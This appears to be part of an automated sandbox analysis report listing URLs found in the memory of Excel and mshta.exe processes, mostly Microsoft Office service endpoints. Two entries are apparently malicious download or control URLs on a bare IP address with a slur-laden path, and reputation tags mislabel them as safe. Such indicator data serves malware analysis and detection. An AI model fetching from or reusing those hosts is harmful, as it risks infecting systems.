                                                                      http://weather.service.msn.com/data.aspxdCEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        https://substrate.office.comaEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://o365auditrealtimeingestion.manage.office.com/api/userauditrecordRV~EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://substrate.office.com_EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		low
                                                                          https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                            		high
                                                                            https://substrate.office.comeEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://substrate.office.comcEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://ncus.contentsync.EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                              		high
                                                                              http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                		high
                                                                                https://substrate.office.comPEXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                  		high
                                                                                  http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehxmshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmp, mshta.exe, 00000015.00000002.616797452.000001E529CE3000.00000004.00000020.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                    		high
                                                                                    https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		low
                                                                                    https://wus2.contentsync.EXCEL.EXE, EXCEL.EXE, 00000000.00000002.630070572.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348449954.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347962348.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345940388.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345595884.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429312535.0000000012F4E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433794378.0000000012F4D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433650143.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535829025.0000000012F49000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://clients.config.office.net/user/v1.0/ios7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                      		high
                                                                                      https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                        		high
                                                                                        https://login.windows.net/common/oauth2/authorizeLxEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                            		high
                                                                                            https://login.windows.net/common/oauth2/authorizeQEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://clients.config.office.net/user/v1.0/android/policies7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                		high
                                                                                                https://login.windows.net/common/oauth2/authorizeTEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.windows.net/common/oauth2/authorizeUEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://entitlement.diagnostics.office.com7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                      		high
                                                                                                      https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429084684.0000000012DF0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                        		high
                                                                                                        https://outlook.office.com/EXCEL.EXE, 00000000.00000003.536668437.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.629731941.0000000012E0B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.433290928.0000000012E15000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.429108675.0000000012E15000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                          		high
                                                                                                          http://157.230.250.107:8080/mfkrmotherfuckeru6y82sas4mshta.exe, 00000015.00000003.544436313.000001E529CE3000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://res.getmicrosoftkey.com/api/redemptioneventslJEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizeBEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeEEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://login.windows.net/common/oauth2/authorizepDEXCEL.EXE, 00000000.00000002.629600267.0000000012D39000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://login.windows.net/common/oauth2/authorize8EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://login.windows.net/common/oauth2/authorize;EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://api.diagnosticssdf.office.comKEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://portal.office.com/account/?ref=ClientMeControlSycEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeMyEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://login.windows.net/common/oauth2/authorize?EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://graph.windows.net/7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                                                  		high
                                                                                                                                  https://devnull.onenote.comEXCEL.EXE, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                                                    		high
                                                                                                                                    https://clients.config.office.net/user/v1.0/macGEXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://login.windows.net/common/oauth2/authorize(EXCEL.EXE, 00000000.00000003.433703991.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345621318.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.430416184.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.347990227.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.630117195.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.535893929.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.348490241.0000000012F87000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://messaging.office.com/EXCEL.EXE, 00000000.00000003.345968829.0000000012F87000.00000004.00000001.sdmp, 7ADE8CA3-69F8-4E49-A5C6-19B4318338FA.0.drfalse
                                                                                                                                          		high
